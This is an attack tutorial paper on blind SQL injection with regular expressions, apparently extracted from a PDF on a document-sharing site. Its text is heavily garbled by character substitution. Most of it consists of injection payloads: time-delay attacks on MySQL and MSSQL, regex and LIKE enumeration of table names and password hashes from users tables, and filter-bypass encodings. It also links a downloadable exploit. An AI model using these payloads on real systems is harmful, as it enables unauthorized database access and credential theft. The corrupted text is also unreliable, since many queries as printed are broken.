Blind Sqli Regexp Attack

Blind Sql Injection Regular Expressions Attack
Blind Sql Injection with Regular

Expressions Attack
Site: www.ihteam.net
! example code
"his paper
Authors:
Simone #uatrini
$arco Rondini
%&'
Index
Why blind sql injection?.......................................................................................................................3
How blind sql injection can be used?...................................................................................................3
Testing vulnerability (MySQ ! MSSQ"#........................................................................................3
Ti$e attac% (MySQ"............................................................................................................................3
Ti$e attac% (MSSQ"...........................................................................................................................&
'ege() attac%*s $ethodology................................................................................................................+
,inding table na$e with 'ege() attac% (MySQ"...........................................................................+
,inding table na$e with 'ege() attac% (MSSQ"...........................................................................-
.()orting a value with 'ege() attac% (MySQ"............................................................................./
.()orting a value with 'ege() attac% (MSSQ"............................................................................./
Ti$e considerations..............................................................................................................................0
1y)assing 2ilters...................................................................................................................................3
'eal li2e e(a$)le..................................................................................................................................3
4onclusions..........................................................................................................................................3
(&'
Why blind sql injection?
Blind S#) Injection is used when a we* application is +ulnera*le to an S#) injection, *ut the
results o- the injection are not +isi*le to the attacker.
"he page with the +ulnera*ilit. ma. not *e one that displa.s data *ut will displa. di--erentl.
depending on the results o- a logical statement injected into the legitimate S#) statement
called -or that page.
"his t.pe o- attack can *ecome time/intensi+e *ecause a new statement must *e cra-ted -or
each *it reco+ered. 01ikipedia2
How blind sql injection can be used?
"here are se+eral uses -or the Blind Sql Injection:
"esting the +ulnera*ilit.3
4inding the ta*le name3
Exporting a +alue3
E+er. techniques are *ased on the 5guess attack5, *ecause we onl. ha+e two di--erent input:
"R6E or 4A)SE. )et me explain *etter...
Testing vulnerability (MySQ ! MSSQ"#
)et5s star with an eas. example. 1e ha+e this t.pe o- 6R):
site.com&news.php7id8(
it will result in this t.pe o- quer. on the data*ase:
SE)E9" : 4R;$ news 1!ERE I< 8 (
=ow, we can tr. some sql injection techniques, -or example the *lind sql injection>
site.com&news.php7id8( and %8?
S#) quer. is now:
SE)E9" : 4R;$ news 1!ERE I< 8 ( and %8?
In this case the quer. will not return an.thing @4A)SEA *ecause % is di--erent -rom ?3 )et5s do
the litmus test: tr. to get the "R6E statement -orcing the A=< to *e "R6E3
site.com&news.php7id8( and ?8?
In this case ? is equal to ?... Bot it> 1e should now see the original news page. 1e now know
that is +ulnera*le to Blind Sql Injection.
Ti$e attac% (MySQ"
1hen .ou can5t see an. kind o- results, .ou must use the time attack.
In this example we will tr. to o*tain the password o- root user in m.sql @i- .our ha+e root
pri+iledges on m.sqlA.
BE=9!$ARC -unction is used to sleep -or some seconds.
D&'
S.ntax: BE=9!$ARC@how man. times,thing to doA.
1hen .ou use it in I4 statement, .ou will *e a*le to make time attack in $.S#)3
SE)E9" %,% 6=I;= SE)E9"
I4@S6BS"RI=B@assword,1,1A8'a',BE=9!$ARC@%?????,S!A%@%AA,?A 6ser,assword
4R;$ m.sql.user 1!ERE 6ser 8 ErootF3
SE)E9" %,% 6=I;= SE)E9"
I4@S6BS"RI=B@assword,1,1A8'b',BE=9!$ARC@%?????,S!A%@%AA,?A 6ser,assword
SE)E9" %,% 6=I;= SE)E9"
I4@S6BS"RI=B@assword,1,1A8'c',BE=9!$ARC@%?????,S!A%@%AA,?A 6ser,assword
SE)E9" %,% 6=I;= SE)E9"
I4@S6BS"RI=B@assword,1,1A8'd',BE=9!$ARC@%?????,S!A%@%AA,?A 6ser,assword
And so on until .ou will see the BE=9!$ARC running @-ew more seconds dela.A. =ow proceed
with the (
nd
word o- the password...
Ti$e attac% (MSSQ"
In this example we will tr. to o*tain the username o- the s.susers ta*le.
A simple wa. to generate time dela.s is to take ad+antage o- one o- the *iggest data*ase
pro*lems, that ha+e made necessar. the de+elopment o- per-ormance/tuning techniques3
hea+. queries. All .ou need to generate a time dela. is to access a ta*le that has some
registers and to *uild a good quer. to -orce the engine to work. In other words, we need to
*uild a quer. ignoring what the per-ormance *est practices recommend. @"his technique was
made *. 9hema Alonso, $icroso-t Securit. $GA
site.com&news.aspx7id8% and @SE)E9" count@:A 4R;$ s.susers AS s.s%, s.susers as
s.s(, s.susers as s.sD, s.susers AS s.sH, s.susers AS s.sI, s.susers AS s.sJ,
s.susers AS s.sK, s.susers AS s.sLAM% and 300M@select top %
ascii@su*string@name,%,%AA -rom s.susersA
ositi+e result. "he condition is true, and the response has a dela. o- %H seconds. 1e actuall.
know that the AS9II +alue o- the -irst usernameFs letter in the s.susers ta*le is lower than
300.
site.com&news.aspx7id8% and @SE)E9" count@:A 4R;$ s.susers AS s.s%, s.susers as
s.s(, s.susers as s.sD, s.susers AS s.sH, s.susers AS s.sI, s.susers AS s.sJ,
s.susers AS s.sK, s.susers AS s.sLAM% and 0 M@select top % ascii@su*string@name,%,%AA
-rom s.susersA
=egati+e Result. ;ne/second response dela.. 1e actuall. know than the AS9II +alue o- the
-irst usernameFs letter in the s.susers ta*le is higher than 0.
And so on -or all the possi*ilities:
0...2 M% and 300 M@select top % ascii@su*string@name,%,%AA -rom s.susersA
14
seconds TRUE

1 second
FALSE
14
seconds TRUE

1 second
H&'
FALSE
1 second
FALSE

1 second
FALSE

14
seconds TRUE

1 second
FALSE

1 second
FALSE

1 second
FALSE

"hen the result is AS9II@%%'A85w5.
Start with the second letter... and so on>
&egex' attac%(s $ethodology
"his is our own creation and it is the -aster to extract in-ormation -rom a data*ase. 1ith this
.ou can sa+e a lot o- time and *andwidth>
"he methodolog. is prett. simple: we de-ine a range o- num*ers&chars&spacial chars that will
*e matched with REBEN @$.S#)A or )ICE @$SS#)A -unctions.
)et5s start with an example *ecause is more simple to understand.
)inding table na$e with &egex' attac% (MySQ"
In this example we will extract the -irst matched record o- in-ormationOschema.ta*les, .ou
must know the name o- data*ase>
index.php7id8% and %8@SE)E9" % 4R;$ in-ormationOschema.ta*les )I$I" ?,%A
1e tested the *lind sql injection attack, and i- we see the correct page, e+er.thing is ok.
index.php7id8% and %8@SE)E9" % 4R;$ in-ormationOschema.ta*les 1!ERE
"AB)EOS9!E$A8P*lindOsqliP A=< ta*leOname REBEN 5Q0a/R25 )I$I" ?,%A
In this case we know that the -irst matched record start with a char *etween 0a /M R2
"hat example will show .ou how to extract the complete name o- the record:
"AB)EOS9!E$A8P*lindOsqliP A=< ta*leOname REBEN 5Q0a-n25 )I$I" ?,%A
True
"AB)EOS9!E$A8P*lindOsqliP A=< ta*leOname REBEN 5Q0a-g25 )I$I" ?,%A
False
"AB)EOS9!E$A8P*lindOsqliP A=< ta*leOname REBEN 5Q0h-n25 )I$I" ?,%A
True
"AB)EOS9!E$A8P*lindOsqliP A=< ta*leOname REBEN 5Q0h-l25 )I$I" ?,%A
False
I&'
"AB)EOS9!E$A8P*lindOsqliP A=< ta*leOname REBEN 5Qm5 )I$I" ?,%A
False
"AB)EOS9!E$A8P*lindOsqliP A=< ta*leOname REBEN 5Qn5 )I$I" ?,%A
True
"he -irst letter o- the ta*le is 5n5. But are there other ta*les start with 5n57 )et5s change the
limit to %,%:
"AB)EOS9!E$A8P*lindOsqliP A=< ta*leOname REBEN 5Qn5 )I$I" %,%A
False
=o, there are no more ta*les that start with 5n5. 4rom now on we must change the regular
expression like this: 5Qn0a-z25 /M 5Qne0a-z25 /M 5Qnew0a-z25 /M 5Qnews0a-z25 /M FALSE
"o test i- we -ound the correct ta*le name, we must test something like this: 5^news$5.
)inding table na$e with &egex' attac% (MSSQ"
4or $SS#), the s.ntax is a little *it more complicated. "here are two limitations: )I$I" and
REBEN are not present. "o *.pass it, we must use "; and )ICE -unctions. See that example:
de-ault.asp7id8% A=< %8@SE)E9" "; % % 4R;$ in-ormationOschema.ta*les 1!ERE
"AB)EOS9!E$A8P*lindOsqliP and ta*leOname )ICE 50a/R2S5 A
True
SE)E9" "; is used to extract the -irst x record -rom in-ormationOschema ta*le.
In $SS#), )ICE -unction is similar to REBEN -unction in $.S#), *ut the s.ntax is not equal.
4or learn more a*out )ICE -unctions consult htt)#55$sdn.$icroso2t.co$5en!
us5library5$s6/30+3.as)( .
1hen .ou need to gra* the second ta*leOname, .ou must use Tta*leOname =;" I= @ SE)E9"
"; x ta*leOname 4R;$ in-ormationOschema.ta*lesAU like in the example *elow:
de-ault.asp7id8% A=< %8@SE)E9" "; % % 4R;$ in-ormationOschema.ta*les 1!ERE
"AB)EOS9!E$A8P*lindOsqliP and ta*leOname =;" I= @ SE)E9" "; % ta*leOname
4R;$ in-ormationOschema.ta*lesA and ta*leOname )ICE 50a/R2S5 A
"he second SE)E9" "; is used to exclude N row and extract the NV%.
)ike in the $.S#) example, we show how to modi-. )ICE expression, to extract the -irst row:
5n0a-z2S5 /M 5ne0a-z2S5 /M 5new0a-z2S5 /M 5news0a-z2S5 /M TRE
;therwise $.S#) ending, we ha+e "R6E *ecause 5!5 de-ine an. string o- Rero or more
characters.
"o check the end, we must append TOU and +eri-. i- exist another character.
5news!5 TRE /M 5news"5 FALSE
J&'
*x'orting a value with &egex' attac% (MySQ"
In this example we will extract a $<I hash -rom a know ta*le name @in this case 5users5A3
Remem*er: $<I can ;=)W contain 0a/-?/'2 +alues.
1e will use the same methodolog. descri*ed in the T4inding ta*le nameU.
index.php7id8% and %8@SE)E9" % 4R;$ users 1!ERE password REBEN 5Q0a-#25 A=<
I<8%A
False
index.php7id8% and %8@SE)E9" % 4R;$ users 1!ERE password REBEN 5Q00-$25 A=<
I<8%A
True
index.php7id8% and %8@SE)E9" % 4R;$ users 1!ERE password REBEN 5Q00-%25 A=<
I<8%A
False
index.php7id8% and %8@SE)E9" % 4R;$ users 1!ERE password REBEN 5Q0&-$25 A=<
I<8%A
True
index.php7id8% and %8@SE)E9" % 4R;$ users 1!ERE password REBEN 5Q0&-'25 A=<
I<8%A
True
index.php7id8% and %8@SE)E9" % 4R;$ users 1!ERE password REBEN 5Q&5 A=<
I<8%A
True
;ur hash start with 5&5 in just J tr.>
*x'orting a value with &egex' attac% (MSSQ"
Same thing as $.S#) and T4inding "a*le nameU. 1e now continue the search o- second char.
An example *elow:
de-ault.asp7id8% A=< %8@SE)E9" % 4R;$ users 1!ERE password )ICE 5I0a-#2S5 A=<
I<8%A
True
de-ault.asp7id8% A=< %8@SE)E9" % 4R;$ users 1!ERE password )ICE 5I0a-c2S5 A=<
I<8%A
False
de-ault.asp7id8% A=< %8@SE)E9" % 4R;$ users 1!ERE password )ICE 5I0d-#2S5 A=<
I<8%A
True
de-ault.asp7id8% A=< %8@SE)E9" % 4R;$ users 1!ERE password )ICE 5I0d-e2S5 A=<
I<8%A
False
de-ault.asp7id8% A=< %8@SE)E9" % 4R;$ users 1!ERE password )ICE 5I#S5 A=<
I<8%A
True
1e ha+e -ound our second char is 5#5 in just I tr.> @"his is also the worst case -or *rute/-orceA
K&'
Ti$e considerations
"ake -or example the $<I case. 1e must export an hash o- D( chars using a *lind sql
injection.
Wou know that there are onl. %J chars to *e tested @%(DHIJKL'?a*cde-A3
In an optimistic case, regexp and normal *lind need D( quer. to *e done3
In a worst/case , regexp need %(L quer. and normal *lind need I%( quer.3
)et5s take now a password case. 1e must export a %I chars password mixalpha/numeric/
special%H. Wou know that there are KJ chars to *e tested
@a*cde-ghijklmnopqrstu+wx.RAB9<E4B!IXC)$=;#RS"6G1NWY?%(DHIJKL'>Z[\SQ]:@A/
OV8A3
In an optimistic case, regexp and normal *lind need %I quer. to *e done3
In a worst/case, regexp need approx 'H quer. and normal *lind need %%H? quer.3
L&'
Regex Normal
0
100
200
300
400
500
600
Max Try
Min Try
Regex Normal
0
200
400
600
800
1000
1200
1400
Max Try
Min try
+y'assing ,ilters
Below are examples o- common -ilters *.pass.
"RI$ @=; SA9ES A));1E<A:
SE)E9"()n*+ ,m-*r+an+)(%()reall.///)(4R;$(),m ser,*us)(users @open and

close a commentA3
SE)E9"0%14R;$0in-ormationOschema.ta*les1 @
parentheses5s rulesA
Special chars like:
!0c 8 -orm -eed, new page
!0$ 8 horiRontal ta*
!0d 8 carriage return
!0a 8 line -eed, new line
Example:
SE)E9"!0$"AB)EO=A$E!0$4R;$!0din-ormationOschema.ta*les
SE9IA) 9!AR @=; 5, T A));1E<A:
6suall. the 5 A=< T are used to input some kind o- string. So .ou can input the !EN
+alue:
SE)E9" passwd 4R;$ users 1!ERE username802313%3d3$3e
1here ?xJ%JHJdJ'Je is the hex +alue o- 5admin5
;r also using the 9!AR -unction:
SE)E9" passwd 4R;$ users 1!ERE
username89;=9A"@9!AR@$'A,9!AR@100A,9!AR@10$A,9!AR@10&A,9!AR@110AA
&eal li,e exa$'le
Wou can download an example o- ! code -rom
http:&&www.ihteam.net&papers&regexpO*sqli.php.tar.gR
-onclusions
"o conclude our paper, we must speci-. that:
%. Is possi*le make a Tcom*oU attack using T"ime AttackU or other3
(. "he regexp that .ou will use, could also *e a list o- chars like T0a*cde-?%(DHIJKL'2U3
D. ;ur English is -u::ing *ad> :A
'&'

Blind Sqli Regexp Attack

Caricato da

Informazioni sul documento

Copyright

Formati disponibili

Condividi questo documento

Condividi o incorpora il documento

Opzioni di condivisione

Hai trovato utile questo documento?

Questo contenuto è inappropriato?

Copyright:

Formati disponibili

Blind Sqli Regexp Attack

Caricato da

Copyright:

Formati disponibili

Blind Sql Injection Regular Expressions Attack

Blind Sql Injection with Regular

"esting the +ulnera*ilit.3

4inding the ta*le name3

Potrebbero piacerti anche